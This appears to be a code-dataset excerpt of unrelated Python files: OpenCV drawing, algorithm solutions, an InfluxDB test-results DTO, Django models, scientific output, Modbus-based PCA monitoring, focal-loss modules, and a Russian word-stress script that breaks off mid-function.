img=np.zeros((512,512,3),np.uint8)
cv.line(img,(0,0),(511,511),(255,255,255),10)              # white diagonal, 10 px
cv.rectangle(img,(384,0),(510,128),(255,0,0),3)            # blue rectangle outline
cv.circle(img,(200,60),20,(0,100,255),3)                   # orange circle outline
cv.ellipse(img,(250,250),(100,50),90,0,180,(255,0,255),3)  # magenta half-ellipse
font=cv.FONT_HERSHEY_SIMPLEX
cv.putText(img,'OpenCV',(10,500),font,4,(255,0,255),3)
cv.imshow('d1',img)
cv.waitKey(0)                                              # block until a key press
|
9,270 | b815f72e2cad351fd9411361a0e7cc75d39ae826 | class Solution:
def eventualSafeNodes(self, graph: List[List[int]]) -> List[int]:
res = []
d = {}
def dfs(node):
if graph[node] == []:
return True
if node in d:
return d[node]
if node in visit:
return False
visit.add(node)
for nei in graph[node]:
if dfs(nei) == False:
d[node] = False
return False
d[node] = True
return True
visit = set()
for i in range(len(graph)):
if dfs(i):
res.append(i)
return res |
9,271 | 84c3427a994bd6c57d9fa8449e4fc7a3de801170 | import json
import time
from pytest_influxdb.data_manager import DataManager
class SuiteResultDTO:
    """Accumulates one pytest run's suite-level results and serializes them as
    an InfluxDB json body.

    NOTE(review): the tag/field overrides live in a CLASS-level dict
    (__suite_result_dict), so they are shared across all instances.
    """
    # Name-mangled class attributes serve as defaults until the setters run;
    # assigning through ``self`` creates shadowing instance attributes.
    __run = 'UNDEFINED'
    __project = 'UNDEFINED'
    __version = 'UNDEFINED'
    __passed = None
    __failed = None
    __skipped = None
    __error = None
    __duration_sec = 0
    __disabled = 0
    __retries = 0
    # Shared mutable override store: {'tags': {...}, 'fields': {...}}.
    __suite_result_dict = {'tags': {}, 'fields': {}}

    def set_run(self, run):
        # Empty strings are ignored so the 'UNDEFINED' default survives.
        if run != '':
            self.__run = str(run)

    def set_project(self, project):
        if project != '':
            self.__project = str(project)

    def set_version(self, version):
        if version != '':
            self.__version = str(version)

    def set_passed(self, passed):
        self.__passed = int(passed)

    def set_failed(self, failed):
        self.__failed = int(failed)

    def set_skipped(self, skipped):
        self.__skipped = int(skipped)

    def set_error(self, error):
        self.__error = int(error)

    def set_duration_sec(self, duration_sec):
        self.__duration_sec = int(duration_sec)

    def set_disabled(self, disabled):
        self.__disabled = int(disabled)

    def set_retries(self, retries):
        self.__retries = int(retries)

    def set_suite_result_dict(self, suite_result_dict):
        # Replaces the CLASS-level override store (shared by all instances).
        SuiteResultDTO.__suite_result_dict = suite_result_dict

    def get_suite_json(self, measurement_name):
        """Build the InfluxDB json body for this suite, then overlay any
        custom tags/fields registered in the shared override store."""
        json_body = [
            {
                "measurement": measurement_name,
                "tags": {
                    "run": self.__run,
                    "project": self.__project,
                    "version": self.__version
                },
                "fields": {
                    "pass": self.__passed,
                    "fail": self.__failed,
                    "skip": self.__skipped,
                    "error": self.__error,
                    "disabled": self.__disabled,
                    "duration_sec": self.__duration_sec,
                    "retries": self.__retries
                }
            }
        ]
        # Appending custom values to json_body
        tags_dict = SuiteResultDTO.__suite_result_dict['tags']
        for key in tags_dict:
            suite_tags = json_body[0]['tags']
            suite_tags.update({key: tags_dict[key]})
        fields_dict = SuiteResultDTO.__suite_result_dict['fields']
        for key in fields_dict:
            suite_fields = json_body[0]['fields']
            suite_fields.update({key: fields_dict[key]})
        return json_body

    def set_tag_values(self, tags_dict):
        # Merges into the shared class-level store, not a per-instance copy.
        suite_tags = SuiteResultDTO.__suite_result_dict
        suite_tags['tags'].update(tags_dict)

    def set_field_values(self, fields_dict):
        suite_fields = SuiteResultDTO.__suite_result_dict
        suite_fields['fields'].update(fields_dict)

    def set_suite_custom_values(self, influxdb_values):
        """Accepts either a json string or an already-parsed dict shaped like
        {'fields': {'suite_result': {...}}, 'tags': {'suite_result': {...}}}."""
        if influxdb_values and influxdb_values != '':
            if isinstance(influxdb_values, str):
                influxdb_values = json.loads(influxdb_values)
            self.set_field_values(influxdb_values['fields']['suite_result'])
            self.set_tag_values(influxdb_values['tags']['suite_result'])

    def get_suite_result_dto(self, terminalreporter, global_values, influxdb_components, db_measurement_name_for_suite):
        """Populate this DTO from pytest's terminalreporter stats plus the
        run-level config, then merge with any prior DB results for the run."""
        # Preparing execution time and suite results from the terminalreporter (where all the data collected)
        execution_time = round(time.time() - terminalreporter._sessionstarttime)
        suite_results_dict = DataManager().get_results_dict(terminalreporter.stats)
        # Setting the values to the suite_result_dto instance
        self.set_passed(suite_results_dict.get('passed'))
        self.set_failed(suite_results_dict.get('failed'))
        self.set_skipped(suite_results_dict.get('skipped'))
        self.set_error(suite_results_dict.get('error'))
        self.set_disabled(suite_results_dict.get('disabled'))
        self.set_duration_sec(execution_time)
        self.set_retries(suite_results_dict.get('reruns'))
        self.set_run(global_values.get("run"))
        self.set_project(global_values.get("project"))
        self.set_version(global_values.get("version"))
        self.set_suite_custom_values(global_values.get("influxdb_values"))
        self.merge_suite_result(global_values.get('merged'), influxdb_components,
                                db_measurement_name_for_suite, global_values.get("run"))
        return self

    def merge_suite_result(self, merged_enabled, influxdb_components, db_measurement_name_for_suite, run_id_value):
        # Merging the existing suite results with the suite_results from db for the same run
        # if 'merged' config value is True
        existing_suite_result = influxdb_components.get_results_by_run(db_measurement_name_for_suite, run_id_value)
        old_suite_list = list(existing_suite_result.get_points(measurement=f'{db_measurement_name_for_suite}'))
        if len(old_suite_list) != 0 and merged_enabled:
            # Recompute 'pass' so pass+fail+skip stays equal to the previous
            # run's total; assumes the test population did not change between
            # the merged runs — TODO confirm.
            old_suite_total_count = old_suite_list[0]['pass'] + old_suite_list[0]['fail'] + old_suite_list[0][
                'skip']
            old_disabled_tests_count = old_suite_list[0]['disabled']
            self.set_passed(
                old_suite_total_count - self.__failed - self.__skipped)
            self.set_disabled(old_disabled_tests_count)
            # Drop the superseded row before the merged result is written.
            influxdb_components.delete_results_by_run(db_measurement_name_for_suite, run_id_value)
|
9,272 | e3ba6395a8d7272fc7e5a8be37e6b0b18c355e14 | from rest_framework import serializers
from api.models.Phones import Phones
class PhoneSerializer(serializers.ModelSerializer):
    """DRF serializer exposing a phone record's id and number components."""
    class Meta:
        model = Phones
        fields = (
            'id', 'number', 'area_code', 'country_code'
        )
|
9,273 | d70986b016e58877c39bfbb76c5bd622c44cbca9 | from collections import namedtuple
from math import tau, sin, cos, atan2
grid = 21
c = grid / 2
points = grid**3
Velocity = namedtuple('Velocity', ('x', 'y', 'z'))
velocity = []
for k in range(grid):
for j in range(grid):
for i in range(grid):
x = (i / grid + 0.25) * tau
y = (j / grid + 0.25) * tau
z = (k / grid + 0.25) * tau
u = cos(x) * sin(y) * cos(z)
v = -sin(x) * cos(y) * cos(z)
w = 0.0
velocity.append(Velocity(u, v, w))
with open('taylor-green.vtk', 'w') as f:
f.write(f"""\
# vtk DataFile Version 2.0
test
ASCII
DATASET STRUCTURED_POINTS
DIMENSIONS {grid} {grid} {grid}
ORIGIN 0.0 0.0 0.0
SPACING 1.0 1.0 1.0
POINT_DATA {points}
VECTORS velocity float
""")
for v in velocity:
f.write(f"{v.x} {v.y} {v.z}\n")
f.write("SCALARS angle float\n")
f.write("LOOKUP_TABLE default\n")
for v in velocity:
f.write("%f\n" % atan2(v.y, v.x)) |
9,274 | 34f79fa3de68b53f19220697815e5bae5270d056 | # Generated by Django 2.1.4 on 2019-01-11 11:58
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('devisa', '0021_auto_20190110_1256'),
]
operations = [
migrations.RemoveField(
model_name='entidade',
name='bairro',
),
migrations.RemoveField(
model_name='entidade',
name='ent_cep',
),
migrations.RemoveField(
model_name='entidade',
name='ent_cnes',
),
migrations.RemoveField(
model_name='entidade',
name='ent_complemento',
),
migrations.RemoveField(
model_name='entidade',
name='ent_dt_expedicao',
),
migrations.RemoveField(
model_name='entidade',
name='ent_dt_inicio_func',
),
migrations.RemoveField(
model_name='entidade',
name='ent_email',
),
migrations.RemoveField(
model_name='entidade',
name='ent_endereco',
),
migrations.RemoveField(
model_name='entidade',
name='ent_especializacao',
),
migrations.RemoveField(
model_name='entidade',
name='ent_fantasia',
),
migrations.RemoveField(
model_name='entidade',
name='ent_fax',
),
migrations.RemoveField(
model_name='entidade',
name='ent_fone',
),
migrations.RemoveField(
model_name='entidade',
name='ent_insc_estadual',
),
migrations.RemoveField(
model_name='entidade',
name='ent_insc_municipal',
),
migrations.RemoveField(
model_name='entidade',
name='ent_numero',
),
migrations.RemoveField(
model_name='entidade',
name='ent_obj_contrato_social',
),
migrations.RemoveField(
model_name='entidade',
name='ent_observacoes',
),
migrations.RemoveField(
model_name='entidade',
name='ent_orgao_exp',
),
migrations.RemoveField(
model_name='entidade',
name='ent_pasta_num',
),
migrations.RemoveField(
model_name='entidade',
name='ent_registro_conselho',
),
migrations.RemoveField(
model_name='entidade',
name='ent_rg',
),
migrations.RemoveField(
model_name='entidade',
name='escolaridade',
),
migrations.RemoveField(
model_name='entidade',
name='formacao_profissional',
),
migrations.RemoveField(
model_name='entidade',
name='municipio',
),
migrations.RemoveField(
model_name='entidade',
name='natureza_juridica_dependencia',
),
]
|
9,275 | 9cd1cb84c457db64019fa542efcf6500aa8d6d42 | '''
Aaditya Upadhyay
oooo$$$$$$$$$$$
oo$$$$$$$$$$$$$$$$$$$$$$$o
oo$$$$$$$$$$$$$$$$$$$$$$$$$$$$$o o$ $$ o$
o $ oo o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$o $$ $$ $o$
oo $ $ "$ o$$$$$$$$$ $$$$$$$$$$$$$ $$$$$$$$o $$o$o$
"$$$$$o$ o$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$o $$$$$$$$
$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$ $$$$$$$$$$$$$$ """$$$
"$$$""""$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ "$$$
$$$ o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ "$$o
o$$" $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$o
$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" "$$$$$ooooo$$$o
o$$
$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ o$$$$$$$$$$$$$$$$$
$$$$$$$$"$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$""""""""
"""" $$$$ "$$$$$$$$$$$$$$$$$$$$$$$$$$$$" o$$$
"$$o """$$$$$$$$$$$$$$$$$$"$$" $$$
$$o "$$""$$$$$$"""" o$$$
$$$o o$$$"
"$$$o o$$$$$o"$$$o o$$$$
"$$$$oo ""$$$o$$$$o o$$$$""
""$$$$
"$$o$$$$$$$$$"""
""$$$$$$oo $$$$$$$$$$
""""$$$$$$$$$$$
$$$$$$$$$$$$
$$$$$$$$$$"
"$$$""""
'''
from sys import stdin, stdout
from collections import *
from math import gcd, floor, ceil
# Competitive-programming stdin/stdout shorthands.
def st(): return list(stdin.readline().strip())             # line -> list of chars
def li(): return list(map(int, stdin.readline().split()))   # line -> list of ints
def mp(): return map(int, stdin.readline().split())         # line -> int iterator
def inp(): return int(stdin.readline())                     # line -> single int
def pr(n): return stdout.write(str(n)+"\n")                 # print n with newline
mod = 1000000007
INF = float('inf')
def solve():
    """Read an integer and print the smallest number >= it such that every
    nonzero decimal digit of the number divides it evenly."""
    def divisible_by_digits(m):
        # Every nonzero digit must divide m; zeros are ignored.
        return all(m % int(d) == 0 for d in str(m) if d != '0')

    candidate = inp()
    while not divisible_by_digits(candidate):
        candidate += 1
    pr(candidate)
for _ in range(inp()):
solve()
|
9,276 | 58eef45f8827df02c0aa0ac45eafa77f70f81679 | # Makes use of the scholar.py Google Scholar parser available here:
# https://github.com/ckreibich/scholar.py
# to run a list of citations collected from other sources (PubMed, PsychINFO, etc.) through
# Google Scholar to return a consistent format and saved as a .csv file.
# This can be imported into a spreadsheet for quicker sorting when conducting a literature review
# For input, the script requires a .txt document with citations to be entered in Google Scholar,
import os
import re
import subprocess
import random as r
# these may not be needed, but I have on occasion run into search limit problems with Google Scholar
# timing searches with a jittered delay may help - I'm not sure
#import time
#d = r.random()*100
#delay = 18000+d
os.chdir('/Users/ethan/Desktop/')
file = 'titles.txt'
with open(file,'r') as f:
text = f.read()
text = re.split("(?m)^\s*$\s*", text)
text = [s.replace('\n', '') for s in text]
os.chdir('/Users/ethan/Documents/Scripts/scholar.py')
citations = []
tot = len(text)
search_item = '-A ' + '"' + text[0] + '"' + ' --csv'
print search_item
for s, val in enumerate(text):
search_item = '-A ' + '"' + val + '"' + ' --csv'
count = str(s+1)
print count + ' of ' + str(tot)
proc = subprocess.Popen(['python', 'scholar.py', search_item], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
citation = proc.communicate()[0]
citation = citation.split('\n')
citation = [s.strip() for s in citation]
citation_delim = []
for s, val in enumerate(citation):
print val
item = val + '|'
citation_delim.append(item)
citations.append(citation_delim)
#time.sleep(delay)
print citations
import re
# make a new text file with the output
header = 'title|url|year|num_citations|num_versions|cluster_id|url_pdf|url_citations|url_versions|url_citation|excerpt \n'
with open('/Users/ethan/Desktop/scholar_output.csv', 'a+') as newfile:
newfile.write(header)
newfile.close()
temp = citations
tot = len(temp)
for s,val in enumerate(temp):
newline = ''.join(val)
newline = newline[0:-2]
newline = re.sub('Title ', '', newline)
newline = re.sub('URL ', '', newline)
newline = re.sub('Year ', '', newline)
newline = re.sub('Citations ', '', newline)
newline = re.sub('Versions ', '', newline)
newline = re.sub('Versions list ', '', newline)
newline = re.sub('Excerpt Objectives ', '', newline)
newline = re.sub('Cluster ID ', '', newline)
newline = re.sub('Excerpt ', '', newline)
newline = re.sub('list ', '', newline)
newline = str(newline) + '\n'
print newline
with open('/Users/ethan/Desktop/scholar_output.csv', 'a+') as newfile:
newfile.write(newline)
newfile.close()
count = str(s+1)
print count + ' of ' + str(tot)
print 'All done!' |
9,277 | 17781ae5e9c72232fbc11c7eda7daeaeb0fa3670 | from .models import CNNClassifier, load_weights, LastLayer_Alexnet, classes, MyResNet
from .transforms import image_transforms, tensor_transform
from .utils import newest_model, Dataset, load_data
|
9,278 | 91cef72962332e7efcc86f1b19da4382bd72a466 | import subprocess
import re
class Command:
    """Pipes Egret parse forests through a persistent Travatar translator
    subprocess and collects the translation together with its derivation
    trace."""
    # Pipeline metadata consumed by the surrounding framework.
    InputSize = 1
    OutputSize = 2
    MultiThreadable = True
    ShareResources = False
    def __init__(self, bin, config, showerr=False):
        # Long-running Travatar process: egret-format input on stdin, the
        # derivation trace on stdout, with buffering disabled so each
        # sentence can be consumed as soon as it is produced.
        self.travatar = subprocess.Popen([bin, "-config_file", config, "-trace_out", "STDOUT", "-in_format", "egret", "-buffer", "false"],
                stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None if showerr else subprocess.PIPE, universal_newlines=True)
        # Matches spans such as "[0, 12]" in trace lines.
        self.span_reg = re.compile(r"\[([0-9]+), ([0-9]+)\]")
    def routine(self, instream):
        """Translate one egret tree.

        instream[0] must begin with the literal line "success" followed by
        the egret tree; otherwise the input is returned untouched with an
        empty translation.  Returns (trace_with_output, translation).
        """
        egret_tree = instream[0]
        if not egret_tree.startswith("success\n"):
            return (egret_tree, "",)
        egret_tree = egret_tree[8:]
        self.travatar.stdin.write(egret_tree)
        self.travatar.stdin.flush()
        travatar_trace = self.travatar.stdout.readline()
        spltrace = travatar_trace.split(" ||| ")
        # The first trace line's span covers the whole input; its end index
        # gives the number of input tokens still to be accounted for.
        m = self.span_reg.match(spltrace[1])
        inputlen = int(m.group(2))
        while True:
            travatar_trace_line = self.travatar.stdout.readline()
            spltrace = travatar_trace_line.split(" ||| ")
            spltree = spltrace[2].split(" ")
            # Double-quoted items in the rule tree are terminals: count them
            # off against the input length to know when the trace is complete.
            for x in spltree:
                if x and x[0] == x[-1] == "\"":
                    inputlen -= 1
            spltrace[4] = ".\n"
            travatar_trace += " ||| ".join(spltrace)
            if not inputlen:
                break
        travatar_output = self.travatar.stdout.readline().rstrip("\n")
        return ("success\n" + travatar_output + "\n" + travatar_trace, travatar_output,)
|
9,279 | 572a9da5edcff3ff5ca0a37f982432f9712dc58c | #!/usr/bin/python
#MTU Server
from config import *
from pymodbus.client.sync import ModbusTcpClient
import time
import numpy as np
import logging
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
import matplotlib.animation as anim
logging.basicConfig()
log = logging.getLogger()
log.setLevel(logging.INFO)
opc1_client = ModbusTcpClient(OPC1_IP, OPC1_PORT)
opc1_client.connect()
opc2_client = ModbusTcpClient(OPC2_IP, OPC2_PORT)
opc2_client.connect()
t = time.time()
Data = []
pca = PCA(n_components = 3)
Data = np.load("data.npy")
pca.fit(Data)
print "PCA Built"
t = time.time()
i = 0
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
y = []
def update(i):
#Read registers from the specific zone
l1 = float(opc1_client.read_holding_registers(L1, 1).registers[0])
l2 = float(opc2_client.read_holding_registers(L2, 1).registers[0])
t1 = float(opc1_client.read_holding_registers(T1, 1).registers[0])
t2 = float(opc2_client.read_holding_registers(T2, 1).registers[0])
v1 = opc2_client.read_holding_registers(V1, 1).registers[0]
v2 = opc1_client.read_holding_registers(V2, 1).registers[0]
p = opc2_client.read_holding_registers( P, 1).registers[0]
f1 = opc2_client.read_holding_registers(F1, 1).registers[0]
f2 = opc1_client.read_holding_registers(F2, 1).registers[0]
f3 = opc2_client.read_holding_registers(F3, 1).registers[0]
h = opc1_client.read_holding_registers( H, 1).registers[0]
v = np.array([[l1, l2, t1, t2, v1, v2, p, f1, f2, f3, h]])
v_transform = pca.transform(v)
y.append(v_transform[0])
x = range(len(y))
ax.clear()
ax.set_title("PCA Based Detection (Top 3 Scores).")
ax.set_ylabel("Top 3 scores")
ax.set_xlabel("Evaluation Points")
ax.set_xlim([0, 1.5*len(y)])
ax.plot(x, y, "x")
print "Simulation will start when the time is 0, 25, 50 ,75"
to = 0
while 1:
toot = int(time.time())%100
if to == toot - 1:
print toot
to = toot
# print to
if to == 0 or to == 25 or to == 50 or to == 75:
break
a = anim.FuncAnimation(fig, update, frames=int(SIM_TIME/SIM_STEP), interval=int(1000*SIM_STEP), repeat=False)
plt.show() |
9,280 | 9e9303d58c7e091bf7432060fad292c16ecf85ee | import torch
import torch.nn as nn
from torch.nn import functional as F
class FocalLoss1(nn.Module):
    """Focal loss over per-class sigmoid probabilities with support for an
    ignore label (default 255) that is masked out of the loss."""
    def __init__(self, alpha=0.25, gamma=2, reduction='mean', ignore_lb=255):
        super().__init__()
        self.alpha = alpha          # class-balance weight for the positive class
        self.gamma = gamma          # focusing exponent
        self.reduction = reduction  # 'mean' divides by the count of valid (non-ignored) pixels
        self.ignore_lb = ignore_lb  # label value excluded from the loss
    def forward(self, logits, label):
        """Compute the focal loss.

        Args:
            logits: tensor of shape (N, C, H, W) — raw per-class scores.
            label: tensor of shape (N, H, W) of integer class ids; entries
                equal to ignore_lb contribute nothing to the loss.
                NOTE: *label* is mutated in place — ignored entries are
                overwritten with 0.

        Returns:
            Scalar loss when reduction == 'mean'; otherwise the unreduced
            per-element loss tensor.
        """
        # overcome ignored label: temporarily map ignored pixels to class 0
        # so the one-hot scatter below stays in range, and remember their
        # coordinates to zero them out of the loss.
        ignore = label.data.cpu() == self.ignore_lb
        n_valid = (ignore == 0).sum()
        label[ignore] = 0
        ignore = ignore.nonzero()
        _, M = ignore.size()
        a, *b = ignore.chunk(M, dim=1)
        mask = torch.ones_like(logits)
        # NOTE(review): relies on advanced-indexing broadcast to clear the
        # mask at every class channel of each ignored location — confirm
        # against the expected (N, C, H, W) layout.
        mask[[a, torch.arange(mask.size(1)), *b]] = 0
        # compute loss
        probs = torch.sigmoid(logits)
        lb_one_hot = logits.data.clone().zero_().scatter_(1, label.unsqueeze(1), 1)
        # pt: probability assigned to the correct "side" of each label.
        pt = torch.where(lb_one_hot == 1, probs, 1 - probs)
        alpha = self.alpha * lb_one_hot + (1 - self.alpha) * (1 - lb_one_hot)
        loss = -alpha * ((1 - pt)**self.gamma) * torch.log(pt + 1e-12)
        loss[mask == 0] = 0
        if self.reduction == 'mean':
            loss = loss.sum(dim=1).sum() / n_valid
        return loss
return loss
class FocalLoss(nn.Module):
    """Binary focal loss on raw logits.

    Numerically stable BCE-with-logits, scaled by exp(gamma * log(p_t)),
    summed over the class dimension when the input is 2-D and averaged.
    Reference: https://www.kaggle.com/c/human-protein-atlas-image-classification/discussion/78109
    """
    def __init__(self, gamma=2):
        super().__init__()
        self.gamma = gamma

    def forward(self, logit, target):
        labels = target.float()
        # Stable closed form of binary cross-entropy with logits.
        stabilizer = (-logit).clamp(min=0)
        bce = (logit - logit * labels + stabilizer
               + ((-stabilizer).exp() + (-logit - stabilizer).exp()).log())
        # log(p_t): log-probability the model assigns to the true label.
        log_pt = F.logsigmoid(-logit * (labels * 2.0 - 1.0))
        focal = (log_pt * self.gamma).exp() * bce
        if focal.dim() == 2:
            focal = focal.sum(dim=1)
        return focal.mean()
|
9,281 | ed85cb61f4bc8bf758dafb10ffbabf87fb4521d0 | #!/usr/bin/env python
import sys
total = 0
for line in sys.stdin:
edges = [int(x) for x in line.split("x")]
edges.sort()
ribbon = sum(x * 2 for x in edges[:2])
l, w, h = edges
bow = l * w * h
total += bow + ribbon
print(total)
|
9,282 | aac9960dafc9e8d3a5670251fcc54eb8e34d4458 | from multiprocessing import Process, Pipe
from time import sleep
from os import getpid
def ponger(pipe, response):
    """Endlessly play ping-pong over *pipe*.

    Blocks on recv(), logs the received message tagged with this process's
    PID, waits one second, then answers with the fixed *response* string.
    Runs forever; intended as the target of a child Process.
    """
    while True:
        msg = pipe.recv()
        print(f"{getpid()} receiving: {msg}")
        # Slow the exchange down so the console output is readable.
        sleep(1)
        pipe.send(response)
if __name__ == '__main__':
ping_conn, pong_conn = Pipe()
Process(target=ponger, args=(ping_conn, 'ping')).start()
Process(target=ponger, args=(pong_conn, 'pong')).start()
ping_conn.send('ping')
|
9,283 | 1bf9785135f6105301d02602e54cbbcbdd249144 | import re, os, nltk, pymorphy2, sys
from suffix_trees.STree import STree
def make_rules(folder):
rules_dictionary = {}
try:
path = os.path.join(os.getcwd(), 'rules', 'data', folder)
files = os.listdir(path)
except:
path = os.path.join(os.getcwd(), 'data', folder)
files = os.listdir(path)
short_files_rule = re.compile('.txt')
for file in files:
if short_files_rule.search(file) != None:
class_name = re.sub('_', ' ', re.sub('\.txt', '', file))
current_file = open(os.path.join(path, file), 'r', encoding='utf-8').read()
affixes = current_file.split(', ')
rules_dictionary[class_name] = affixes
return(rules_dictionary)
def find_affixes(rules_noun, lemma, word_possible_stress):
    """Collect stress-rule affixes that match *lemma*.

    For every (stress_type, affixes) pair in *rules_noun*, each affix is
    interpreted by its dash notation: "xx-" is a prefix, "-xx" a suffix and
    "xx-...-yy" a prefix/suffix combination.  Matching affixes are appended
    to word_possible_stress[stress_type] as (affix, kind) tuples; the
    (mutated) dict is returned.
    """
    for stress_type, affixes in rules_noun.items():
        for affix in affixes:
            affix_type = ''
            regexp = None
            if re.search('^[а-яё]+\-$', affix) != None:
                regexp = '^'+affix[:-1]
                # Fixed: was misspelled 'preffix', so find_possible_types'
                # check for 'prefix' could never match a prefix rule.
                affix_type = 'prefix'
            elif re.search('^\-[а-яё]+$', affix) != None:
                regexp = affix[1:]+'$'
                affix_type = 'suffix'
            elif re.search('^[а-яё]+\-\.\.\.\-[а-яё]+$', affix) != None:
                regexp = '^'+re.sub('\-\.\.\.\-', '.+', affix)+'$'
                affix_type = 'combination'
            # Skip affixes in none of the three recognised shapes; previously
            # this reused a stale regexp (or raised NameError on the first
            # affix) because regexp was never reset.
            if regexp is not None and re.search(regexp, lemma) != None:
                if stress_type in word_possible_stress:
                    word_possible_stress[stress_type].append((affix, affix_type))
                else:
                    word_possible_stress[stress_type] = [(affix, affix_type)]
    return(word_possible_stress)
def find_biggest_affixes(word_possible_stress):
    """Pop the generic 'all suffixes' / 'all prefixes' entries and return the
    longest affix string found in each (empty string when the key is absent),
    together with the pruned dict."""
    longest_prefix = ''
    longest_suffix = ''
    suffix_entries = word_possible_stress.pop('all suffixes', None)
    if suffix_entries is not None:
        # max with key=len keeps the first of equal-length candidates,
        # matching a strict "longer than" scan.
        longest_suffix = max((entry[0] for entry in suffix_entries), key=len, default='')
    prefix_entries = word_possible_stress.pop('all prefixes', None)
    if prefix_entries is not None:
        longest_prefix = max((entry[0] for entry in prefix_entries), key=len, default='')
    return(longest_prefix, longest_suffix, word_possible_stress)
def find_possible_types(word_possible_stress, biggest_suffix, biggest_prefix):
    """Return the stress types whose matched affix equals the longest
    suffix/prefix found for the word.

    A prefix+suffix combination entry takes priority over everything
    collected so far.
    """
    possible_types = []
    for stress_type, affixes in word_possible_stress.items():
        for affix in affixes:
            if affix[1] == 'suffix':
                if affix[0] == biggest_suffix:
                    possible_types.append(stress_type)
            elif affix[1] == 'prefix':
                if affix[0] == biggest_prefix:
                    possible_types.append(stress_type)
            elif affix[1] == 'combination':
                # NOTE(review): a combination entry discards every type
                # gathered so far even when the combination then fails to
                # match — confirm this unconditional reset is intentional.
                possible_types = []
                # pair keeps the dashes: ('xx-', '-yy'), matching how the
                # longest prefix/suffix are stored.
                pair = affix[0].split('...')
                if pair[0] == biggest_prefix and pair[1] == biggest_suffix:
                    possible_types.append(stress_type)
    return(possible_types)
def make_stressed_word(possible_types, token, lemma, biggest_suffix, original_token):
if possible_types[0] == 'prefix' or possible_types[0] == 'first vowel':
stressed_word = re.sub('^([^уеыаоэяиюёУЕЫАОЭЯИЮЁ]*[уеыаоэяиюёУЕЫАОЭЯИЮЁ])', '\g<1>\'', token)
#print(token, stressed_word, lemma, biggest_prefix, biggest_suffix)
elif possible_types[0] == 'suffix' or possible_types[0] == 'suffix 1':
stem = STree([token, lemma]).lcs()
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)+'$', '', stem)
for num in range(1,5):
if stem == stem_cutted:
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)[:-num]+'$', '', stem)
stressed_word = re.sub('^('+stem_cutted+'[^уеыаоэяиюёУЕЫАОЭЯИЮЁ]*[уеыаоэяиюёУЕЫАОЭЯИЮЁ])', '\g<1>\'', token)
elif possible_types[0] == 'suffix 2':
stem = STree([token, lemma]).lcs()
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)+'$', '', stem)
for num in range(1,5):
if stem == stem_cutted:
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)[:-num]+'$', '', stem)
stressed_word = re.sub('^('+stem_cutted+'([^уеыаоэяиюёУЕЫАОЭЯИЮЁ]*[уеыаоэяиюёУЕЫАОЭЯИЮЁ]){2})', '\g<1>\'', token)
elif possible_types[0] == 'suffix 3':
stem = STree([token, lemma]).lcs()
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)+'$', '', stem)
for num in range(1,5):
if stem == stem_cutted:
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)[:-num]+'$', '', stem)
stressed_word = re.sub('^('+stem_cutted+'([^уеыаоэяиюёУЕЫАОЭЯИЮЁ]*[уеыаоэяиюёУЕЫАОЭЯИЮЁ]){3})', '\g<1>\'', token)
elif possible_types[0] == 'presuffix':
stem = STree([token, lemma]).lcs()
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)+'$', '', stem)
for num in range(1,5):
if stem == stem_cutted:
stem_cutted = re.sub(re.sub('-', '', biggest_suffix)[:-num]+'$', '', stem)
suffixes = re.sub(stem_cutted, '', stem)
stressed_word = re.sub('([уеыаоэяиюёУЕЫАОЭЯИЮЁ])([^уеыаоэяиюёУЕЫАОЭЯИЮЁ]*'+suffixes+'.{,5})$', '\g<1>\'\g<2>', token)
elif possible_types[0] == 'type B':
stressed_word = re.sub('^(.+[уеыаоэяиюё])([^уеыаоэяиюё]*)$', '\g<1>\'\g<2>', token)
try:
parts = stressed_word.split('\'')
stressed_word = original_token[:len(parts[0])]+'\''+original_token[len(parts[0]):]
except:
stressed_word = original_token
return(stressed_word)
def process_stresses(part_of_speech, rules, pos, lemma, token, original_token, word_possible_stress, current_file):
stressed_word, biggest_suffix, possible_types = '', '', ['']
if part_of_speech in pos:
word_possible_stress = find_affixes(rules, lemma, word_possible_stress)
if word_possible_stress != {} and list(word_possible_stress.keys()) != ['all prefixes', 'all suffixes'] and \
list(word_possible_stress.keys()) != ['all suffixes'] and list(word_possible_stress.keys()) != ['all prefixes']:
biggest_prefix, biggest_suffix, word_possible_stress = find_biggest_affixes(word_possible_stress)
possible_types = find_possible_types(word_possible_stress, biggest_suffix, biggest_prefix)
if len(possible_types) == 1:
stressed_word = make_stressed_word(possible_types, token, lemma, biggest_suffix, original_token)
current_file = re.sub(original_token, stressed_word, current_file)
## if pos == 'VERB':
## print(pos, lemma, token, stressed_word, biggest_suffix, possible_types[0])
if possible_types == []: possible_types = ['']
return(current_file, stressed_word, biggest_suffix, possible_types[0])
def initialize(current_file):
morph = pymorphy2.MorphAnalyzer()
rules_noun = make_rules('NOUN')
rules_adj = make_rules('ADJ')
rules_verb = make_rules('VERB')
all_tokens = nltk.word_tokenize(current_file)
stressed_words, biggest_suffixes, stress_types, poses = [], [], [], []
for token in all_tokens:
stressed_word, biggest_suffix, stress_type = token, '', ''
original_token = token
token = token.lower()
word_possible_stress = {}
if re.search('^[А-ЯЁа-яё\-]+$', token) != None and token != '-':
token = re.sub('^-', '', token)
pos = morph.parse(token)[0].tag.POS
